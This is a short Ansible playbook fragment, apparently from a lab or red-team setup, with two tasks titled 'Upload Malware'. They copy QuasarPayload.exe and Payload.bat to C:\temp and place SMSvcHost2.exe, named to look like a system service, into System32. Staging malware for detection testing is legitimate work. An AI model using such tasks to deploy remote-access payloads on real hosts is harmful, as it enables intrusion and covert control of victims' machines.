    - name: Upload Malware
      win_copy:
        src: 'files/{{item}}'
        dest: 'C:\Windows\System32\{{item}}'
      with_items:
        - SMSvcHost2.exe

    - name: Upload Malware
      win_copy:
        src: 'files/{{item}}'
        dest: 'C:\temp\{{item}}'
      with_items:
        - QuasarPayload.exe
        - Payload.bat
